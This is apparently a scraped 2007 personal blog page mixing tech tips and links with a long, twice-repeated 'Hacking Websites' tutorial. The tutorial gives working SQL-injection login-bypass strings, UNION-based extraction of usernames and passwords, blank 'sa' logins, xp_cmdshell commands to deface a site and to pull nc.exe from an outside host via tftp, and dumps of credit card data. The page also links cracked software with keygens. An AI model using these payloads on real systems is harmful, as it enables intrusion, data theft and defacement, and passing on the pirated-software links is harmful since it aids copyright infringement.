PDF24 provides free PDF-Software that enables everyone to create PDF files
100% free PDF-Software
The 100% free PDF-Software provided by PDF24.org works with all Windows programs und has a lot of features that you wouldn’t expect from a free software: create PDF files from almost every Windows-application, re-order pages, merge, split, and password-protect your existing PDF-files. PDF creator download
Hint: If you have your company’s logo or any other picture file at hand you can create your own personalized version.
Online PDF-Converter for your Website
Using our online PDF converter you can convert the most common file-formats into a PDF without installing any software. The only thing you have to do is upload your file to our website and the resulting PDF will be emailed to you shortly afterwards. You can even integrate the online PDF converter into your own website.
Monday, March 30, 2009
Saturday, December 1, 2007
GOOGLE ROCKS AGAIN… GMail drive…
Chk it out.. Things you need to have:
1) Gmail account
2) Gmail Drive software Process:
i) Download Gmail Drive from (takes seconds to download)
http://www.softpedia.com/progDownload/GMail-Drive-shell-extension-Download-15944.html
ii) Install the software.
iii) After installing, a drive named Gmail drive will be created in My Computer (just like C: D.
iv) double click on this drive, login to Gmail acct. You will get a space of 5.1 GB.
v) Whatever content you copy to this drive will be sent to your mail acct directly to which you have logged in. The copy is pretty fast.
HATS OFF GOOGLE.
GMail Drive
GMail Drive is a Shell Namespace Extension that creates a virtual drive in the Windows Explorer, allowing you to use your Google Gmail account as a storage medium. It allows you to do basic file manipulation, such as copy and delete, on files inside the GMail folder. Because it is a Shell Extension, the interface you work in is Windows Explorer itself. GMail files are physically stored as e-mails on your Google Gmail account.
The files are stored in mail attachments, and the filename and file information (such as file size) is stored in the message subject line.
Wednesday, November 21, 2007
MUAHAHAHA
follow the simple steps:
Click Start -> Run.
Type RegEdit in the Open text box, then press ENTER.
In the Registry Editor, locate and click the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom
Modify the value of the Autorun to 0 (zero) so that CD-ROMs and Audio CDs do not run and start automatically when inserted.
Next navigate to the following registry subkey:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Modify the value of the NoDriveTypeAutoRun entry to 0xb5 value to turn off the AutoRun feature for CD-ROMs by right-click NoDriveTypeAutoRun and then click Modify to type B5 in the Value data box. Select Hexadecimal, and then click OK.
Quit Registry Editor.
Restart your computer.
The steps to kill the virus is…
Go to Task Manager (Ctrl+Alt+Del)
in that click on Process Tab
Delete only the svchost.exe of your user name
type c:\heap41a in you address barof your explorer and you can trace this folder
Click Start -> Run.
Type RegEdit in the Open text box, then press ENTER.
In the Registry Editor, locate and click the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom
Modify the value of the Autorun to 0 (zero) so that CD-ROMs and Audio CDs do not run and start automatically when inserted.
Next navigate to the following registry subkey:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Modify the value of the NoDriveTypeAutoRun entry to 0xb5 value to turn off the AutoRun feature for CD-ROMs by right-click NoDriveTypeAutoRun and then click Modify to type B5 in the Value data box. Select Hexadecimal, and then click OK.
Quit Registry Editor.
Restart your computer.
The steps to kill the virus is…
Go to Task Manager (Ctrl+Alt+Del)
in that click on Process Tab
Delete only the svchost.exe of your user name
type c:\heap41a in you address barof your explorer and you can trace this folder
Wednesday, October 31, 2007
Listen Music 23 Free Online FM Music Radio
Listen Music 23 Free Online FM Music Radio
23 Online Live Radio channels, Fm Radio, Songs, Latest Songs, Listen Music
No Download just listen online
http://www.onlinehindiradio.com
23 Online Live Radio channels, Fm Radio, Songs, Latest Songs, Listen Music
No Download just listen online
http://www.onlinehindiradio.com
Tuesday, October 30, 2007
FM on GTalk
FM is on your GTalk now ( Teen Taal 110...,only hindi songs)
For this u need to follow these steps...,
1) add this id in ur GTalk: service@gtalk2voip.com
2) than add: 110@radio.gtalk2voip.com
After completion of these 2 steps
Then make a cal to 110@radio.gtalk2voip.com than u wil be directly connected to teen taal FM radio station
--
--
Thanks n Regards
Dilip Ramadas
For this u need to follow these steps...,
1) add this id in ur GTalk: service@gtalk2voip.com
2) than add: 110@radio.gtalk2voip.com
After completion of these 2 steps
Then make a cal to 110@radio.gtalk2voip.com than u wil be directly connected to teen taal FM radio station
--
--
Thanks n Regards
Dilip Ramadas
Hacking Websites
Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.
The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434
Part I – Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------
This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.
login.htm
logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become
"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "
Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:
"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "
And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide
Chintan ' --
Chintan " --
or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!
IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm
More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------
Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like
http://www.nosecurity.com/mypage.asp?id=45
in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page.
The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".
Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.
What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.
OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
>From the error its clear that first table is 'logintable'.
It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5
The above error message shows that the first field or column in logintable is login_id. To get the next column name will type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5
So we get one more field name as 'login_name'. To get the third field name we will write
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5
Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5
Thats the login name "Rahul" and to get the password of Rahul the query would be
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5
Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.
Part II - using port 1434 (SQL Port)
-------------------------------------
Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !
The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are
sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’
sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables
xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)
xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver
xp_regdeletekey -> Deletes a registry key.
xp_regdeletevalue ->Delets a registry value
xp_regread -> Reads a registry value
xp_regwrite -> Writes a registry key.
Jun 30 xp_terminate_process -> Stops a process
Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.
Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.
Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.
Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.
Jun 30 C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type
C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”
Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
And
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
Output:
Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000
Write something in index.html file ?
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”
Wanna upload any file on the remote system.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’” delete
And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.
Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.
Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
Precautionay measures
---------------------------
<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.
Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like
http://sqlsecurity.com
http://www.cert.org
NOTE: This information is only for education purposes, use it carefully! Don't blame me if it doesn't work or does work!!!
The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434
Part I – Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------
This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.
login.htm
logincheck.asp
<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>
Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become
"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "
Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:
"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "
And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide
Chintan ' --
Chintan " --
or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!
IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm
More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------
Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like
http://www.nosecurity.com/mypage.asp?id=45
in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page.
The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".
Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.
What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.
OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line
>From the error its clear that first table is 'logintable'.
It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5
The above error message shows that the first field or column in logintable is login_id. To get the next column name will type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5
So we get one more field name as 'login_name'. To get the third field name we will write
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5
Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5
Thats the login name "Rahul" and to get the password of Rahul the query would be
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5
Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.
Part II - using port 1434 (SQL Port)
-------------------------------------
Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !
The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are
sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’
sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables
xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)
xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver
xp_regdeletekey -> Deletes a registry key.
xp_regdeletevalue ->Delets a registry value
xp_regread -> Reads a registry value
xp_regwrite -> Writes a registry key.
Jun 30 xp_terminate_process -> Stops a process
Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.
Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.
Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.
Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.
Jun 30 C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]
Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type
C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”
Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
And
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
Output:
Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000
Write something in index.html file ?
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”
Wanna upload any file on the remote system.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’” delete
And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.
Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.
Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
Precautionay measures
---------------------------
<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.
Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like
http://sqlsecurity.com
http://www.cert.org
NOTE: This information is only for education purposes, use it carefully! Don't blame me if it doesn't work or does work!!!
Friday, October 26, 2007
Find invisible frnds now in yahooooo...........
go to http://www.invisible.ir/ n jus type the email id the person whose status u wanna find. This is 100% efficient
IMROVE UR XP PERFORMANCE!!!!!!!!
hi
i have one software thru which u can clean errors in the registry of windows xp. it is a very cool software ::::
http://rapidshare.com/files/54146652/WinASO_1_.Registry.Optimizer_3.0.9_Incl.Keygen-ViRiLiTY.rar
One more software for taking backup and restoring all the drivers of the pc. it is the most popular software all over the world:::::::::::
http://rapidshare.com/files/54148361/Dri.GenPro.v7.1.622.Multilingual.rar
this converter is most wanted but it is not easily available. it converts mp3 or any other format to real player format so that u can save ur disk space:::::::
http://rapidshare.com/files/54150795/realconverterpro.rar
KeYGEN:
http://rapidshare.com/files/54151002/Real.Converter.Pro.v6.5.Keymaker.Only-CORE.rar
u can convert videos also to real player format thru this converter.......
i have one software thru which u can clean errors in the registry of windows xp. it is a very cool software ::::
